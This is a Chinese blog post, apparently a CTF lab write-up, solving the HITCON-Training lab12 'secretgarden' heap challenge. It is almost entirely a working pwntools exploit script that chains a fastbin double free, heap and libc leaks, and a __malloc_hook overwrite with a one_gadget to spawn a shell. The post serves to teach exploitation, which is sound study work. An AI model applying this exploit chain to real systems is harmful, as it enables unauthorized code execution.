HITCON-Training lab12 secretgarden fastbin attack

wjh 收录于 Pwn

2020-12-16 2024-02-12 约 500 字预计阅读 1 分钟 - 次阅读 - 条评论

本来是在看Angelboy的视频来着，看到他有这个例题于是我就去github找，做完了才发现原来lab虽然序号一样，但是好像主题不是同一个。阴差阳错做了这题，既然做了就放出来吧，不过我的写法不是最优写法。题目中也有magic函数，但是我没用。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
from pwn import *
from LibcSearcher import *
context.log_level = "debug"
r = process('./secretgarden')
#r = remote("training.pwnable.tw", 11012)
def choice(idx):
    r.sendlineafter("Your choice : ", str(idx))

def add(size, name = 'a', color = 'a'):
    choice(1)
    r.sendlineafter("Length of the name :", str(size))
    r.sendafter("The name of flower :", name)
    r.sendlineafter("The color of the flower :", color)

def visit():
    choice(2)

def delete(idx):
    choice(3)
    r.sendlineafter("Which flower do you want to remove from the garden:", str(idx))

def clean():
    choice(4)

add(0x68) #0
add(0x68) #1
add(0x68) #2

#double free
delete(0)
delete(1)
delete(0)

#fastbin attack & change size to 0xA1 for unsorted bin
add(0x68, '\x40') #3 == 0
add(0x68) #4 == 1
visit()
r.recvuntil('flower[3] :')
heap_addr = u64(r.recvuntil('\n')[:-1].ljust(8, '\x00'))
log.success('heap_addr: ' + hex(heap_addr))
add(0x68, p64(heap_addr + 0x60) + 'b' * 0x50 + p64(0x71) + p64(heap_addr + 0x60)) #5
add(0x68, '\x00') #6
add(0x68, p64(0) + p64(0x31) + p64(0) + p64(heap_addr + 0xB0) + '\x11' * 0x18 + p64(0xA1)) #7
delete(1)
add(0x68, p64(0) + p64(0x31) + p64(1) + p64(heap_addr + 0xE0)) #8
visit()

#unsorted bin leak
main_arena_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, '\x00')) - 88
log.success('main_arena_addr: ' + hex(main_arena_addr))
malloc_hook_addr = main_arena_addr - 0x10
log.success('malloc_hook_addr: ' + hex(malloc_hook_addr))
libc = LibcSearcher('__malloc_hook', malloc_hook_addr)
libc_base = malloc_hook_addr - libc.dump('__malloc_hook')
log.success('libc_base: ' + hex(libc_base))
one = [0x45226, 0x4527a, 0xf0364, 0xf1207]
one_gadget = libc_base + one[2]
log.success('one_gadget: ' + hex(one_gadget))

#getshell
add(0x68) #9
add(0x68) #10
delete(9)
delete(10)
delete(9)
add(0x68, p64(malloc_hook_addr - 0x23))
add(0x68)
add(0x68)
add(0x68, 'a' * 0x13 + p64(one_gadget))
delete(9)
delete(9)

r.interactive()